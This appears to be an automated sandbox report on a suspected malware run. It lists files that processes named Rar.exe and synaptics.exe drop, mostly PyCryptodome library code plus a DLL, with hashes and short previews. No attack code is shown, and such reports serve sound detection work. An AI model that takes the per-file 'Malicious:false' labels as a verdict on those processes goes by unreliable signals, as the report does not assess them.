                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):44
                                                                                                                                                                                      Entropy (8bit):4.516027641266231
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                                                                      MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                                                                      SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                                                                      SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                                                                      SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20415
                                                                                                                                                                                      Entropy (8bit):5.443242297483508
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:KwGALFMLX4XG+dj/WacI0yhn4HytBQwOTZ8UfXpmJWa7Bbq2KhVCIOG:KdAemj/iI0yh4HytOqUfAJWmbTMBOG
                                                                                                                                                                                      MD5:903435CB077CE4003E1946B42105EC4A
                                                                                                                                                                                      SHA1:20EFD7F8DAB471B4DF7A59A087B270F8F237960E
                                                                                                                                                                                      SHA-256:E01CE00BAA4CEE2991561327381842B44EF1F0EEC254F022F2DCAF11E927F3CB
                                                                                                                                                                                      SHA-512:EEB10BC15174E88574C5A3160E29994BC9C929E5845605F97755F3AA844ED41BBDED0265929A34A510FA0C4FD3757D4EFFB4D69956929F68C8D4C6CA0C58945E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.Y.......................@...s$...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...e.d.d...Z e.d.d...Z!d'd.d...Z"d(d.d...Z#G.d.d...d.e$..Z%d)d.d...Z&d*d.d...Z'd.d...Z(d.d...Z)d.d...Z*d+d d!..Z+d"d#..Z,d,d%d&..Z-d.S.)-.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Crypto.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Crypto.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *data_out,.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):207
                                                                                                                                                                                      Entropy (8bit):5.118274351448721
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/ZlpQylud+Z/dZ6+4o+uaHxEM9ArM7BL9+:C362uAZ//6+4Tlh19+
                                                                                                                                                                                      MD5:C88B54D5F2CF87725D3BBD632636A3E2
                                                                                                                                                                                      SHA1:52A97A6BE18C581CE76F4651B049AF8569145309
                                                                                                                                                                                      SHA-256:DCEEAB8204DD17F8AAA367FC2FDA9536AC0A3D42FD8E4A62F3DA3D7C7F115F1F
                                                                                                                                                                                      SHA-512:9BE6B1EFC8F2A24CB202126631EEF7909B8F140B51217BAA427EE2067C041717C042EA5BCAB3A2EB6653201ACE253702584B00DA4D4153192FB39CAC8C04B57C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f1........................@...s....g.d...Z.d.S.).).Z.KDFZ.SecretSharingZ.DHN)...__all__..r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\Crypto\Protocol\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9728
                                                                                                                                                                                      Entropy (8bit):5.135904494493939
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:oY6GI5NPEtoTB8zRWcNWJjRjOlSszZ0Ewh4MVnrGeN:wvJTB8fYJNjsDwhznrGU
                                                                                                                                                                                      MD5:05969A7400A260E57F2DAD65544867A4
                                                                                                                                                                                      SHA1:4AE65E8F97D7AB71C5729555C3C92CEA1AF969EC
                                                                                                                                                                                      SHA-256:427C831901265053C4F7AE53B7B60078A0A70381D6EA050ED0944556C396EAE8
                                                                                                                                                                                      SHA-512:9984DBA0DEFC3EF23AB5FDD0B311ECEA6EAA0BA07D8CD9A2CBF6FC7F47D8764110B8A9A2C4F05FE1BEDDBD54F604E2F7A659C73F38767C5B3894298E2E98022B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'..co..co..co..j.!.go..v...ao..(...`o..co..@o..v...ho..v...io..v...bo..Y..bo..Y..bo..Y.M.bo..Y..bo..Richco..................PE..L...9..e...........!...%............N........0...............................p............@..........................5..d...d5..d....P.......................`..X...x1...............................0..@............0..|............................text...[........................... ..`.rdata.......0......................@..@.data........@....... ..............@....rsrc........P......."..............@..@.reloc..X....`.......$..............@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23060
                                                                                                                                                                                      Entropy (8bit):4.8542965681461245
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:zUe8B4XpyRj8fJ8RbvNWrJVs2okSpSuR4rmSISAX:zH8Qkj8foQrvA4rmSrAX
                                                                                                                                                                                      MD5:7F4C4E4A51254CF7C23BAD8DF3940A4B
                                                                                                                                                                                      SHA1:19497A8225DD25DA5379CBB343581383D886B97A
                                                                                                                                                                                      SHA-256:479862D6D569DDFF438312AF51E1757D6A748ABF932507A3C08564F33DFF6BD5
                                                                                                                                                                                      SHA-512:62B6196FCB08A837644697519755F2C01C77A386E5083D5CA79303E2EC33A8525A45A7C589B83F95B553F0EE7F82860F9EB108CF070F6DC45615777DF6370F33
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# PublicKey/DSA.py : DSA signature primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1412
                                                                                                                                                                                      Entropy (8bit):4.9317569017679235
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                                                                      MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                                                                      SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                                                                      SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                                                                      SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):67427
                                                                                                                                                                                      Entropy (8bit):4.857152735652469
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:HrpnnHM/SBQx60ma/iVVffcIsutOPT/Tl/fokmC1DuYKG:HrdW6gYffcnjBXYI1
                                                                                                                                                                                      MD5:725F8EC9C104AA3C6B0950278B06BC42
                                                                                                                                                                                      SHA1:86691C9548643EEC3FCF405B9795EF5A11FDDE8A
                                                                                                                                                                                      SHA-256:F17C068FD0BC1DCA2CC84366CF2CCB5CECF89DCB460EA7BE6C3BF64387AB9FB7
                                                                                                                                                                                      SHA-512:D9CF278693EAC5866F7AD7B8223F95608BEB1CE255DA6FC31152DA2980B8DC82432FAFF2B2879F094489E53ABE5422F8FA3097AB3277A708698455991E42A421
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3368
                                                                                                                                                                                      Entropy (8bit):4.623430359144985
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:PjOqA+h7+/O1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAow58Kk1VZFGK0SOrTQASxCs
                                                                                                                                                                                      MD5:D6B0C334F2E86B944B8B5C595D46091B
                                                                                                                                                                                      SHA1:6D774B4906613E8AEDE7889D06E5F57C3BA51DE5
                                                                                                                                                                                      SHA-256:11E9396C412E693B5A7D2B9A455BF7596853BE94BC0FCE01F292C1732934CBA3
                                                                                                                                                                                      SHA-512:A58B1231C7EEBBEC0AFE7192A59204912A88D5E3F51A0356811DCBC11158A11E5D4FF617B4682817D8BE56C88FDA27BBAB95850C77C876336A2DE25927F129EB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... def size_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):8901
                                                                                                                                                                                      Entropy (8bit):4.841428903824507
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:cwPQHv3DZKGLo/sNke4hft2vVHZNfvXv/Ii:zPeY2v1ZNf/oi
                                                                                                                                                                                      MD5:F85B4D32AF5D4BBD777FB171BB3B3BD2
                                                                                                                                                                                      SHA1:EC768344A4163127698DDEA1D4D0D63E6EAF7D49
                                                                                                                                                                                      SHA-256:54F3AB21742989AD8BC1AA56D34505F1601E1DBFAEA89A121F981784FF339DB5
                                                                                                                                                                                      SHA-512:82D02ECDB710663402330D41E181BB36E73C095C417DE68A1B030F44DF0D90EF6134BFDB919C93F5951622CACAABF25D351811464410D9B159B5E075086BBE29
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# ElGamal.py : ElGamal encryption/decryption and signatures..#..# Part of the Python Cryptography Toolkit..#..# Originally written by: A.M. Kuchling..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WI
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):692
                                                                                                                                                                                      Entropy (8bit):4.899620335781504
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                                                                      MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                                                                      SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                                                                      SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                                                                      SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31755
                                                                                                                                                                                      Entropy (8bit):4.716755149805653
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:+r6qvF2WYnlLZlnIEgLH3azy+uAlsKMWsKtCVeC:+rpdzYn9Zln0OLuAlsnKtCf
                                                                                                                                                                                      MD5:0947B4DBE43E62701069600DBDF79A8C
                                                                                                                                                                                      SHA1:0FC15553FE43466C3E23A2524771E15F2203D317
                                                                                                                                                                                      SHA-256:5047981C1EF9B12C37FF5E5010FC9BB200FA2C7EEC64EB002ABD452944864A0E
                                                                                                                                                                                      SHA-512:E904116A422EC30B52DCFBDA65FB19FF73852E4CC02107D59F785C170B42E6E040846F14F2ADCCA4ED3DFA6DE3527D531342EB60DF30AA4EA5929693029A441C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..# ===================================================================..#..# Copyright (c) 2016, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2599
                                                                                                                                                                                      Entropy (8bit):4.5725118156821445
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:1REquT4+vZ7+/0wWsAInlNAE+jm53s+eZNcN4n6Rs9Y+CMKoUDT+YsUVRVxzL3:B+h7+/05sX5+jm2+eDqszdPUDXVHVL3
                                                                                                                                                                                      MD5:0DF7584DEADC1160766A1CF2E07FA3D2
                                                                                                                                                                                      SHA1:79484FB8B9D7CE922DEBCAF136CDE6176DF649B4
                                                                                                                                                                                      SHA-256:5CBA0D3C44217538026D4585ACA8F592FC0B21AD618AB11D45715539A365E024
                                                                                                                                                                                      SHA-512:DD9AF3B3D3CBD332D831206883BF3C902ADCD828108215C00FA0D898B310A92A23D581BA3A513A5EA50880022E6DACF44E0AD1AF52253EE1F094F348F7B971E8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from typing import Callable, Union, Tuple, Optional, overload, Literal....from Crypto.Math.Numbers import Integer..from Crypto.IO._PBES import ProtParams....__all__ = ['generate', 'construct', 'import_key',.. 'RsaKey', 'oid']....RNG = Callable[[int], bytes]....class RsaKey(object):.. def __init__(self, **kwargs: int) -> None: ....... @property.. def n(self) -> int: ..... @property.. def e(self) -> int: ..... @property.. def d(self) -> int: ..... @property.. def p(self) -> int: ..... @property.. def q(self) -> int: ..... @property.. def u(self) -> int: ..... @property.. def invp(self) -> int: ..... @property.. def invq(self) -> int: ....... def size_in_bits(self) -> int: ..... def size_in_bytes(self) -> int: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool:... # legacy.. def public_key(self) -> RsaKey: ..... def __eq__(self, other: obj
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3236
                                                                                                                                                                                      Entropy (8bit):5.060017011908534
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:KIB0jcQHMsvI/S3oCFG+FA16eY6ByyvHDKZQLPmO/x/c6VevK94i:dFQHvo7LQT4P6QLeO/a6CK94i
                                                                                                                                                                                      MD5:4A857A07C057F9867133A3BDF93BCE2F
                                                                                                                                                                                      SHA1:C49098F9F3D62CDAF15C53AE244AFD60C25356CF
                                                                                                                                                                                      SHA-256:EE62ED1363AE2633B7498B8AE333E525CEBA8AF94CBA9F1C6DF4939581C759D8
                                                                                                                                                                                      SHA-512:AB6B0492D6B6C1EC1BB792611493A6E1760B7B7E0F7D1610E6578DFA511E4963DE637E52E7BD2699696845DB6BE75CC96CEC44A47ED06E167719981483B436DE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- coding: utf-8 -*-..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ================================================================
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):23799
                                                                                                                                                                                      Entropy (8bit):5.5436089399767585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Zh5ntLDIVVMEPHq5Bk2esJSEgEBNZU0VgwpPjpNRui1GwCO7NJZKY:ltwMES5m2nJoEdB/pPzPCO7XX
                                                                                                                                                                                      MD5:3CD17EFF54CFF19C11CF72DBA8AEAFAE
                                                                                                                                                                                      SHA1:55BDA90383639E9285839867AF0F40A71386D22A
                                                                                                                                                                                      SHA-256:38A754A99C2AB51128D32E409399D94DFC4073316E457984D591EF1FE98BD2B1
                                                                                                                                                                                      SHA-512:4AE870897BBF176F290E9081D4AB9A6F84635C18FEC2255B0937719D25633D53341E848D3ED413621C69D0E67FF2DD76D6B430F75EAC28D5A1BDE36299FA1F77
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o..........f.|.......................@...s....g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...G.d.d...d.e...Z.d#d.d...Z.d$d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z d.d...Z!d.d...Z"d%d d!..Z#e#Z$d"Z%d.S.)&)...generate..construct..import_key..RsaKey..oid.....N)...Random)...tobytes..bord..tostr)...DerSequence..DerNull)...bytes_to_long)...Integer)...test_probable_prime..generate_probable_prime..COMPOSITE)..._expand_subject_public_key_info.._create_subject_public_key_info. _extract_subject_public_key_infoc....................@...sV...e.Z.d.Z.d.Z.d.d...Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z..6.5dKd7d8..Z.d9d:..Z.d;d<..Z d=d>..Z!d?d@..Z"dAdB..Z#dCdD..Z$dEdF..Z%dGdH..Z&dIdJ..Z'd5S.)Lr....a....Class defining an
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1711
                                                                                                                                                                                      Entropy (8bit):5.396142590240559
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:NwzSTw1WWXezNJeVvcsso0Gar/xCVf9SVY:lsk4UreRbsoiSx
                                                                                                                                                                                      MD5:1F068416EBC1509D06B7A922BCF00DED
                                                                                                                                                                                      SHA1:6109B9CF3A809D5BE23BA7EFA6175908AACBB2DC
                                                                                                                                                                                      SHA-256:2E0E46452A58696628FCDE095EE30E633F18EAC4DAB47717FFF6387E306AA3DF
                                                                                                                                                                                      SHA-512:E28274A318359A71EF35651570336CCCFA0E01F9DF649DFE9EB7EF6DF32879C3455B4716010798C267C230F0A00A40FB678F493E0029A14B3DF2838E37304EB0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
